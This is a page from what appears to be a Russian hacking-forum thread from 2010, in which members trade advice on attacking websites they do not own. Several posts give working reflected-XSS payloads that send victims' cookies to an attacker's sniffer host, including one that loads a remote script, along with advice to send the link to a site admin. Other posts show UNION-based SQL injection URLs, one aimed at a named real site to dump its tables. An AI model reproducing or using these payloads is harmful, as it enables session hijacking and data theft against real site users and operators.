Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    Естественно, когда уже скуль найдена и вывод есть, то дампить или выводить данные можно программно - лично я так и делаю. А искать вручную.
     
  3. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Верно, согласен, ищешь для начала в ручную, потому как проги далеко не все жрут и находят, а пот дампить 200к записей в ручную, это абсолютно не реально, а вот если только пасс накопать, тогда понятно, можно и ручками.
    Сори за оффтоп
     
  4. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше? :) Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером? Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?
    Не пинайте только)
    https://forum.antichat.ru/thread20140.html - это читал, но не нашел (или не понял) ответа((
     
    #14064 Boa, 11 Jul 2010
    Last edited: 11 Jul 2010
  5. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Если на сайте с авторизацией, то сунуть админу, если нет - забить.


    Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/

    Почитай еще, там есть ответ на твой последний вопрос..
     
    #14065 wkar, 11 Jul 2010
    Last edited: 11 Jul 2010
    1 person likes this.
  6. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Есть)
    Персонал-версию скачал, поставил на хосте, конфиг оставил как есть. Попробовал дать залогиненному юзеру ссылку с
    Code:
    <script>img=new Image();img.src="http://*****.ru/sniffer/i.gif?"+document.cookie;"+document.cookie;</script>
    , и ссылку с
    Code:
    <script>img=new Image();img.src="http://*****.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;</script>
    , т.к. не знаю, адрес какой картинки подставлять) Но на сниффер ничего не пришло. Или я совсем туплю и нужно указывать адрес вовсе не к картинке? Запутался.
     
  7. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    2Boa
    качай делюкс _ссылка самоуничтожится через 5 минут
    + надо немного подправить конф ($sniffer_path = "http://sniffer_path/")
    + там есть немного фака


    имхо, но лучше так
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    где обращаетса к http://haknet.h16.ru/script/js.js

    а в js.js есть:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
    этот способ более надёжен.

    ПС
    сылка должнa быть не на нартинку (i.gif) а на скрипт(s.gif)
     
    #14067 wkar, 11 Jul 2010
    Last edited: 12 Jul 2010
    1 person likes this.
  8. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Code:
    http://******.ru/archive.php?year=<script>img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;</script>
    Что тут неправильно?( Путь в конфиге прописал.

    Второй вариант трудоемок, а у меня два ночи) попробую потом.
     
  9. Decoy

    Decoy New Member

    Joined:
    4 Dec 2005
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Привет!

    Спасибо за ответ! Первый запрос не отработал - результат тот же (долгая загрузка, пустая страница).

    Интересное наблюдение:
    Code:
    http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.user_privileges--+
    работает, а
    Code:
    http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.tables--+
    нет.

    Получается, смотреть некоторые таблицы из INFORMATION_SCHEMA удается, другие - нет. Причем не сильно похоже на разграничение доступа, в противном случае была бы ошибка.
     
    #14069 Decoy, 11 Jul 2010
    Last edited: 11 Jul 2010
  10. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Пробел видишь ? Там после передачи будет стоять %20

    А выглядеть он будет так :
    Чтобы там был пробел после передачи надо поставить +.
    это во первых, а во вторых везде где стоять + замени их на %2b,после передачи там автоматически будет стоять +,если не поставишь %2b там будет стоять пробел :)

    Вот например:
    Code:
    http://*.ru/archive.php?year=<script>img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"</script>
     
    1 person likes this.
  11. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Decoy
    Ну если первый запрос не сработал значит там нет таблиц отвечающих критерию запроса => нужно составить запрос по другому, пробуй захексить column_name=user
    без процентиков, а вобще с линком былобы просще... сори больше не знаю что тебе посоветовать)
    PS:проверь таблицы вставив в принтабельное поле count(*) фромь так же как в посте выше.
     
  12. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    тупой вопрос, раньше их пропускал, а ща задумался.
    Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    смотря какой фильтр, все зависит от кода
     
    _________________________
  14. happygirl

    happygirl New Member

    Joined:
    10 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(version()),0x71),0x71),4,5--+
    ->5.0.91-community

    http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(table_name),0x71),0x71),4,5 %20from%20information_schema.tables%20where%20table_schema='jain4_jain4jain' limit 1,1--+

    Не обуви стол?
     
    #14074 happygirl, 12 Jul 2010
    Last edited: 12 Jul 2010
  15. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    что тут можно сделать? 9 алертов вылезает.
    http://www.unsigned.com/scriptalertscript
     
  16. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло :(
    Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.
     
    #14076 Boa, 12 Jul 2010
    Last edited: 12 Jul 2010
  17. Decoy

    Decoy New Member

    Joined:
    4 Dec 2005
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Dare

    https://forum.antichat.ru/showpost.php?p=2243791&postcount=14265

    Попробовал
    Code:
    http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+
    Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?
     
  18. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Мб что просто нет к ней доступа (прав не хватает), но ты же грил что некоторые таблицы читал?
    Без линка увы ни чем помочь не смогу, если что стучи в асю или ПМ
    Последний пост на эту тему!
     
    #14078 Dare, 12 Jul 2010
    Last edited: 12 Jul 2010
  19. Decoy

    Decoy New Member

    Joined:
    4 Dec 2005
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Dare

    Ссылка выше. :)

    Я думаю, если проблема в правах доступа, то сайт выдал бы ошибку (из-за нехватки аргументов), как если сделать select 1,2,3,4 вместо select 1,2,3,4,5.

    PS Постучал по ICQ.
     
  20. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Надеюсь там есть уязвимость XSS-injection ? :D

    Если что открой страницу кода и посмотри как он там передался.
     
Thread Status:
Not open for further replies.